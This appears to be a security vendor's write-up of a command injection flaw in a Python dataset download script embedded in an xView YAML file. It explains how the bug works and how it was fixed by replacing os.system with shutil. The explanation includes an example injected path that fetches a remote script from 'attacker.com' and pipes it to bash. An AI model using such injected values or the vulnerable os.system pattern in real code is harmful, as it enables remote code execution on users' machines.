How command injection happens in Python os.system() and how to fix it
Summary
A critical command injection vulnerability was found in the data/xView.yaml dataset download script used by a machine learning pipeline. The culprit: a single line — os.system(f'rm -rf {labels}') — that handed a user-influenced filesystem path directly to the shell. An attacker who controls the YAML configuration file could inject shell metacharacters into the labels path and achieve arbitrary command execution on the host machine. The fix is clean and decisive: throw out the shell call entirely and use Python's native filesystem APIs instead.
Introduction
The data/xView.yaml file defines how the xView aerial imagery dataset is downloaded and prepared for training. Buried inside its embedded Python download script, at line 102, was this line:
os.system(f'rm -rf {labels}')
The labels variable is a pathlib.Path object constructed from a base path that originates in the YAML configuration itself:
labels = Path(path / 'labels' / 'train')
Because path is derived from user-supplied or user-modifiable configuration, an attacker who can influence the YAML file can influence labels — and therefore influence the shell command that gets executed. This is the textbook definition of OS command injection (CWE-78), and it carries a critical severity rating because exploitation requires only the ability to supply a crafted dataset YAML file, which is a completely normal and expected operation when training on custom datasets.
The Vulnerability Explained
What went wrong
Python's os.system() passes its argument to the system shell (/bin/sh on Unix). When you use an f-string to build that argument, you're constructing a shell command string — and the shell will interpret every metacharacter in that string.
The vulnerable line:
os.system(f'rm -rf {labels}')
If labels evaluates to /path/to/project/labels/train, this becomes:
rm -rf /path/to/project/labels/train
Perfectly harmless. But if an attacker controls the base path and sets it to something like:
/tmp/labels; curl http://attacker.com/shell.sh | bash
The resulting shell command becomes:
rm -rf /tmp/labels; curl http://attacker.com/shell.sh | bash
The shell executes both commands. The ; metacharacter acts as a command separator, and the attacker's payload runs with the same privileges as the Python process.
Realistic attack scenarios
Scenario 1 — Malicious dataset distribution:
An attacker publishes a modified xView.yaml (or a custom dataset YAML that follows the same pattern) on a public repository or model hub. A researcher downloads it and runs the training pipeline. The download script executes, and the injected command runs silently alongside the legitimate rm -rf.
Scenario 2 — Supply chain attack:
In a CI/CD pipeline that automatically fetches dataset configurations, a compromised upstream YAML file triggers command execution on the build server, potentially exfiltrating secrets or installing backdoors.
Scenario 3 — Local privilege escalation:
In a shared compute environment (e.g., a university GPU cluster), a user places a crafted YAML in a shared directory. Another user with higher privileges runs training, and the injected command executes under their account.
Why f-strings make this worse
An f-string gives the appearance of clean, readable code — there's no obvious string concatenation that might trigger a code reviewer's instinct. But f'rm -rf {labels}' is functionally identical to 'rm -rf ' + str(labels) from the shell's perspective. Both produce a single string that the shell will parse and execute in full, metacharacters and all.
The Fix
The fix is elegant because it doesn't try to sanitize the input — it eliminates the shell entirely.
Before (vulnerable)
import os
from pathlib import Path
# ...
labels = Path(path / 'labels' / 'train')
os.system(f'rm -rf {labels}')
labels.mkdir(parents=True, exist_ok=True)
After (fixed)
import shutil
from pathlib import Path
# ...
labels = Path(path / 'labels' / 'train')
if labels.is_symlink() or labels.is_file():
labels.unlink()
else:
shutil.rmtree(labels, ignore_errors=True)
labels.mkdir(parents=True, exist_ok=True)
Why this fix works
1. No shell is ever invoked.
shutil.rmtree() and Path.unlink() are pure Python functions that make direct system calls. There is no shell process, no shell parsing, and therefore no opportunity for shell metacharacter injection. It doesn't matter what characters are in labels — they're treated as a literal filesystem path, not as a shell command string.
2. The import os is replaced with import shutil.
This is a meaningful signal: the fix doesn't just patch the dangerous call — it removes the dependency that enabled it. os.system() is no longer available in this script's namespace.
3. Symlink and file edge cases are handled explicitly.
The fix distinguishes between symlinks/files (labels.unlink()) and directories (shutil.rmtree()). The original rm -rf handled both implicitly via the shell. The explicit Python version is actually more correct and more readable.
4. ignore_errors=True preserves the original intent.
The original rm -rf silently succeeds even if the path doesn't exist. shutil.rmtree(labels, ignore_errors=True) matches that behavior without swallowing unexpected errors in a way that masks bugs.
Prevention & Best Practices
Never use os.system() with dynamic input
os.system() should be treated as a code smell in modern Python. It offers no argument separation, no output capture, and no protection against injection. The Python docs themselves recommend subprocess as a replacement — but even subprocess is dangerous with shell=True.
| Pattern | Safe? | Notes |
|---|---|---|
os.system(f'rm -rf {path}') |
❌ | Shell injection, no output capture |
subprocess.run(f'rm -rf {path}', shell=True) |
❌ | Same shell injection risk |
subprocess.run(['rm', '-rf', str(path)]) |
✅ | No shell, args passed directly |
shutil.rmtree(path) |
✅ | Best: no subprocess at all |
Prefer native Python filesystem APIs
For filesystem operations, Python's standard library almost always has a safe equivalent:
# Instead of: os.system('rm -rf /some/path')
shutil.rmtree('/some/path', ignore_errors=True)
# Instead of: os.system('cp src dst')
shutil.copy2(src, dst)
# Instead of: os.system('mkdir -p /some/path')
Path('/some/path').mkdir(parents=True, exist_ok=True)
# Instead of: os.system('mv src dst')
Path(src).rename(dst)
Use shlex.quote() as a last resort
If you absolutely must pass a path to a shell command, use shlex.quote() to escape it:
import shlex
import subprocess
# If you truly cannot avoid a shell call:
safe_path = shlex.quote(str(labels))
subprocess.run(f'some-tool --input {safe_path}', shell=True, check=True)
shlex.quote() wraps the string in single quotes and escapes any internal single quotes, preventing shell interpretation. But this should be a last resort — the preferred solution is always to avoid the shell entirely.
Audit YAML-embedded scripts
Dataset configuration files that embed executable Python scripts (a pattern used by several ML frameworks) deserve special security scrutiny. Any path, URL, or string value that flows from YAML configuration into a shell command is a potential injection point. When reviewing such files, trace every variable that touches os.system(), subprocess, or eval().
Relevant standards
- CWE-78: Improper Neutralization of Special Elements used in an OS Command
- OWASP A03:2021: Injection — command injection is explicitly covered
- OWASP Command Injection Defense Cheat Sheet: recommends avoiding shell calls and using language-native APIs
Key Takeaways
os.system()with an f-string is always dangerous when the interpolated value is user-influenced — in this case, thelabelspath inxView.yamlwas directly derived from YAML configuration that any user can modify.- The
labelsvariable in the download script was the taint source — it flowed from YAML path configuration intoos.system()without any sanitization or quoting. - Replacing
os.system()withshutil.rmtree()is not just a patch — it's a structural fix that makes injection impossible by design, regardless of what the path contains. - YAML files that embed executable scripts are an underappreciated attack surface in ML pipelines; every dynamic value that reaches a shell call must be treated as potentially attacker-controlled.
shutil.rmtree()withignore_errors=Trueis a drop-in behavioral replacement forrm -rfthat requires zero shell involvement and handles the symlink/file/directory distinction correctly.
How Orbis AppSec Detected This
- Source: The
pathvariable derived from YAML dataset configuration indata/xView.yaml, which flows intolabels = Path(path / 'labels' / 'train') - Sink:
os.system(f'rm -rf {labels}')atdata/xView.yaml:102— a shell-invoking function receiving an f-string built from the taintedlabelsvariable - Missing control: No shell escaping (e.g.,
shlex.quote()), no input validation, and no use of shell-free filesystem APIs before the value reachedos.system() - CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
- Fix: Replaced
os.system(f'rm -rf {labels}')withshutil.rmtree(labels, ignore_errors=True)andlabels.unlink(), removing the shell invocation entirely
Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.
Conclusion
A single line — os.system(f'rm -rf {labels}') — was enough to introduce a critical command injection vulnerability into an ML dataset pipeline. The root cause isn't exotic: it's the combination of a shell-invoking function and an f-string built from user-influenced data, a pattern that appears frequently in data science and ML codebases where shell commands are used as quick shortcuts for filesystem operations.
The fix demonstrates the right mental model: when you need to delete a directory in Python, reach for shutil.rmtree(), not os.system('rm -rf ...'). The Python standard library has safe, shell-free equivalents for virtually every common filesystem operation. Using them doesn't just fix a vulnerability — it makes the entire class of shell injection attacks structurally impossible in that code path.
If you maintain ML pipelines that use YAML-embedded download scripts, this is a good moment to audit every call to os.system(), subprocess.run(..., shell=True), and eval() and ask: does any user-controlled value reach this call? If the answer is yes, the shell needs to go.